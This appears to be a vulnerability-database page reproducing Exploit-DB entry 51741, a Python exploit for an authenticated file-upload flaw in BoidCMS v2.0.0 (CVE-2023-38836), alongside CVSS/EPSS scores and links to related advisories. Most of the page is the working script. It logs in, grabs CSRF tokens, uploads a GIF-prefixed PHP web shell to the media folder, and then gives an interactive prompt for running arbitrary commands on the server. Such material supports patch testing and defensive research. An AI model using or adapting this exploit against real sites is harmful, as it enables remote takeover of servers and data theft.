Lucene search
1337kidEDB-ID:51741HistoryOct 09, 2023 - 12:00 a.m.
BoidCMS v2.0.0 - authenticated file upload vulnerability
2023-10-0900:00:00
1337kid
www.exploit-db.com
186
exploit
boidcms
file upload
vulnerability
authenticated
cve-2023-38836
python
ubuntu
command injection
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.673 Medium
EPSS
Percentile
98.0%
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd
def showhelp():
print(parser.print_help())
exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()
with requests.Session() as s:
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":user,
"password":passwd,
"login":"Login",
}
form_login_data['token']=token
s.post(f'{base_url}/admin',data=form_login_data)
#=========== File upload to RCE
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)Related
cve
cve
CVE-2023-38836
2023-08-21 17:15:47
osv
osv
CVE-2023-38836
2023-08-21 17:15:47
zdt
zdt
BoidCMS v2.0.0 - authenticated file upload Exploit
2023-10-09 00:00:00
BoidCMS 2.0.0 Command Injection Exploit
2024-03-02 00:00:00
metasploit
metasploit
BoidCMS Command Injection
2024-02-12 23:44:24
cvelist
cvelist
CVE-2023-38836
2023-08-21 00:00:00
githubexploit
githubexploit
Exploit for Unrestricted Upload of File with Dangerous Type in Boidcms
2023-08-16 14:30:30
nvd
nvd
CVE-2023-38836
2023-08-21 17:15:47
prion
prion
Unrestricted file upload
2023-08-21 17:15:00
packetstorm
packetstorm
BoidCMS 2.0.0 Shell Upload
2023-10-10 00:00:00
BoidCMS 2.0.0 Command Injection
2024-03-01 00:00:00
rapid7blog
rapid7blog
Metasploit Wrap-Up 03/08/2024
2024-03-08 17:00:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
0.673 Medium
EPSS
Percentile
98.0%
Related for EDB-ID:51741